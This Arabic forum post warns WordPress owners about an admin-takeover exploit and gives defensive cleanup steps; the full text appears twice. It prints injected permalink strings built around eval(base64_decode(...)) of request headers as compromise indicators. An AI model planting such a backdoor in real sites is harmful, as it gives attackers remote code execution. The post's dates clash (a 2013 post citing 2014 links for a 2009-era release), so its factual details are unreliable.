linnou
11-01-2013, بتوقيت غرينيتش 08:24 AM
الســــلام عليكمم ورحمة الله وبركاته شباب,,,
http://sec-r1z.com/images/r1z-1/wordpress-0-d4y.jpg (http://sec-r1z.com/images/r1z-1/wordpress-0-d4y.jpg)
توني قريا خبر "تحذير" من موقع الوورد برس الغني عن التعريف بتحديث update بيانات جميع مستخدمين الوورد برس, سواء كأدمن - يوزر , حيث اعربوا بأن مستخدمين الوورد برس يتعرضون لهذا النوع من الإكسبلويت كل ساعه ! حيث يقوم المخترق بزع عضوية الأدمن عند تسجيله بلمدونة blog فقط !
اقتباس
للوقاية من الثغره:
1- تحديث update مدونتك الان, الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 .
2- إصدار تقرير من الوورد برس : كيفية الحفـــاظ على مدونتك امنة (http://wordpress.org/development/2014/09/keep-wordpress-secure/), بلإضافة الى معلومات حول كيفية عمل تحديث update فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ) (http://wordpress.org/development/2014/08/2-8-4-security-release/).
3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث update مدونتك لأخر إصدار, وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا, بحالة لم تستطع معرفة إصدار مدونتك,, وجب عليكم التحديث update عبر الموقع الرسمي للورد برس من هنـــا (http://wordpress.org/) حالا.
4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديث updateك حاليا" لإصدار مدونتك, لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة,, لاكن بحالة عدم ترقية upgrade مدونتك, وجب عليكم الترقية upgrade الأن.
5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب, لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق, وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا, ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها, حيث تملك وورد برس اكثر من 5,317,360 مليون مشترك بلعالم !
6- التخوف او الملل من التحديث update حالا: إن هذا التحديث update مطلوب من جميع اعضاء وورد برس, حيث ان هذه الثغره تعتبر قاتلة لمدونتك, فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث update إضافات الوورد برس لديك "إن وجد تحديث update لها" حالا .
بحالة وجد تحديث updateات للوورد برس, فسيتم كتابة تحديث update للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز, وسيتم إبلاغ اعضائنا بنفس اللحظة.
* اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟
اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث update معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن, والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا, والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود code خبيث" او "شل كود code" بهم ,,وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة blog, معلومات شخصية ومواضيع شخصية اخرى, ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود code " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة, وذالك يعتمد على المخترق, فيتم إختراق سيرفر SERVERك كامل من هذه الثغره, فنتمنى التحديث update الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفر SERVERك ايضا !
ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال
رمز PHP:
<code style="white-space:nowrap"> <code> %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER %5D))%7D%7D|.+)&%/
</code> </code>
رمز PHP:
<code style="white-space:nowrap"> <code> 7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE% 5D))%7D%7D|.+)&%
</code> </code>
ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم,, معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ,, يوجد بعض الهاك productات "تخفي" الأعضاء سواء أدمن او يوزر,, فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود code للصفحة والبحث فيها عن Administrator او Admin او user_ ,, فبحالة عدم وجود شي فإن شاء الله انت بامان,,,
بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب,, ولاكن لو وجد فإن شاء الله نحلها لكم,,, لاكن بحالة "لاسمح الله" تم إختراق مدونتكم, او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة, او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له,,, فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس WordPress-to-WordPress Import WordPress Plugin (http://technosailor.com/2014/07/05/wordpress-to-wordpress-import/) ومن ثم عن طريقها ( بعد تثبيت setupها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا , ومن ثم نقوم بتامين ( صور المدونة blog وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة blog
رمز PHP:
<code style="white-space:nowrap"> <code> /home/username/public_html/wp-content/uploads
</code> </code>
رمز PHP:
<code style="white-space:nowrap"> <code> /home/username/public_html/images
</code> </code>
بلحالة هذه بعد الحفظ نقوم بحذف المدونة blog ( كاملة ) ومن ثم تصطيب مدونة blog جديدة من هذا الرابط ( الإصدار الاخير للوررد برس 2.8.4 - إضغط هنا (http://wordpress.org/latest.zip) ) , ومن ثم بعد التركيب install نقوم بتركيب install الإضافة الي قمنا بسحب معلومات مدونتنا فيها, ومن ثم نقوم بلضفط على Import للملف الي سحبناه من المدونة blog.
وبإذن الله ترجع المدونة blog 100% نظيفة من اي شل كود code او كود code خبيث من المخترق , وايضا من اي ( شك ) بنفسنا بعد الإختراق .
للتقليل من إختراق المدونات ( يرجى ) من الجميع نشر الخبر وتحذير كل مالك مدونة blog من هذه الإكسبلويت عبر هذا الموضوع او منكم شخصيا ( مسنجر او منتدى ),, بحيث تقلل من هذه الإختراقات لمدونات الوورد برس,, وبحالة وجود اي شي إضافي هذا الدعم الفني
( برنامج الوورد برس من هنا (http://www.wordpress.org/support) ).
الثغره ( الكود code ) لم يتم الإعلان عنها بمواقع الحماية حاليا ,,, مثل ماقلت قبل الثغره اكيد برايفت مازالت, واتوقع صعب تظهر للجميع حاليا.
روابط لها صلة بلموضوع
How To Completely Clean Your Hacked WordPress Installation (http://smackdown.blogsblogsblogs.com/2014/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
Journey Etc. has a possible solution (http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/)
WordPress-to-WordPress Import WordPress Plugin (http://technosailor.com/2014/07/05/wordpress-to-wordpress-import/)
تحياتي
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
http://sec-r1z.com/images/r1z-1/wordpress-0-d4y.jpg (http://sec-r1z.com/images/r1z-1/wordpress-0-d4y.jpg)
توني قريا خبر "تحذير" من موقع الوورد برس الغني عن التعريف بتحديث update بيانات جميع مستخدمين الوورد برس, سواء كأدمن - يوزر , حيث اعربوا بأن مستخدمين الوورد برس يتعرضون لهذا النوع من الإكسبلويت كل ساعه ! حيث يقوم المخترق بزع عضوية الأدمن عند تسجيله بلمدونة blog فقط !
اقتباس
للوقاية من الثغره:
1- تحديث update مدونتك الان, الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 .
2- إصدار تقرير من الوورد برس : كيفية الحفـــاظ على مدونتك امنة (http://wordpress.org/development/2014/09/keep-wordpress-secure/), بلإضافة الى معلومات حول كيفية عمل تحديث update فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ) (http://wordpress.org/development/2014/08/2-8-4-security-release/).
3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث update مدونتك لأخر إصدار, وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا, بحالة لم تستطع معرفة إصدار مدونتك,, وجب عليكم التحديث update عبر الموقع الرسمي للورد برس من هنـــا (http://wordpress.org/) حالا.
4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديث updateك حاليا" لإصدار مدونتك, لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة,, لاكن بحالة عدم ترقية upgrade مدونتك, وجب عليكم الترقية upgrade الأن.
5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب, لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق, وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا, ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها, حيث تملك وورد برس اكثر من 5,317,360 مليون مشترك بلعالم !
6- التخوف او الملل من التحديث update حالا: إن هذا التحديث update مطلوب من جميع اعضاء وورد برس, حيث ان هذه الثغره تعتبر قاتلة لمدونتك, فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث update إضافات الوورد برس لديك "إن وجد تحديث update لها" حالا .
بحالة وجد تحديث updateات للوورد برس, فسيتم كتابة تحديث update للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز, وسيتم إبلاغ اعضائنا بنفس اللحظة.
* اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟
اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث update معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن, والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا, والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود code خبيث" او "شل كود code" بهم ,,وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة blog, معلومات شخصية ومواضيع شخصية اخرى, ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود code " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة, وذالك يعتمد على المخترق, فيتم إختراق سيرفر SERVERك كامل من هذه الثغره, فنتمنى التحديث update الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفر SERVERك ايضا !
ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال
رمز PHP:
<code style="white-space:nowrap"> <code> %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER %5D))%7D%7D|.+)&%/
</code> </code>
رمز PHP:
<code style="white-space:nowrap"> <code> 7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE% 5D))%7D%7D|.+)&%
</code> </code>
ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم,, معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ,, يوجد بعض الهاك productات "تخفي" الأعضاء سواء أدمن او يوزر,, فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود code للصفحة والبحث فيها عن Administrator او Admin او user_ ,, فبحالة عدم وجود شي فإن شاء الله انت بامان,,,
بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب,, ولاكن لو وجد فإن شاء الله نحلها لكم,,, لاكن بحالة "لاسمح الله" تم إختراق مدونتكم, او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة, او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له,,, فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس WordPress-to-WordPress Import WordPress Plugin (http://technosailor.com/2014/07/05/wordpress-to-wordpress-import/) ومن ثم عن طريقها ( بعد تثبيت setupها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا , ومن ثم نقوم بتامين ( صور المدونة blog وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة blog
رمز PHP:
<code style="white-space:nowrap"> <code> /home/username/public_html/wp-content/uploads
</code> </code>
رمز PHP:
<code style="white-space:nowrap"> <code> /home/username/public_html/images
</code> </code>
بلحالة هذه بعد الحفظ نقوم بحذف المدونة blog ( كاملة ) ومن ثم تصطيب مدونة blog جديدة من هذا الرابط ( الإصدار الاخير للوررد برس 2.8.4 - إضغط هنا (http://wordpress.org/latest.zip) ) , ومن ثم بعد التركيب install نقوم بتركيب install الإضافة الي قمنا بسحب معلومات مدونتنا فيها, ومن ثم نقوم بلضفط على Import للملف الي سحبناه من المدونة blog.
وبإذن الله ترجع المدونة blog 100% نظيفة من اي شل كود code او كود code خبيث من المخترق , وايضا من اي ( شك ) بنفسنا بعد الإختراق .
للتقليل من إختراق المدونات ( يرجى ) من الجميع نشر الخبر وتحذير كل مالك مدونة blog من هذه الإكسبلويت عبر هذا الموضوع او منكم شخصيا ( مسنجر او منتدى ),, بحيث تقلل من هذه الإختراقات لمدونات الوورد برس,, وبحالة وجود اي شي إضافي هذا الدعم الفني
( برنامج الوورد برس من هنا (http://www.wordpress.org/support) ).
الثغره ( الكود code ) لم يتم الإعلان عنها بمواقع الحماية حاليا ,,, مثل ماقلت قبل الثغره اكيد برايفت مازالت, واتوقع صعب تظهر للجميع حاليا.
روابط لها صلة بلموضوع
How To Completely Clean Your Hacked WordPress Installation (http://smackdown.blogsblogsblogs.com/2014/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
Journey Etc. has a possible solution (http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/)
WordPress-to-WordPress Import WordPress Plugin (http://technosailor.com/2014/07/05/wordpress-to-wordpress-import/)
تحياتي
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
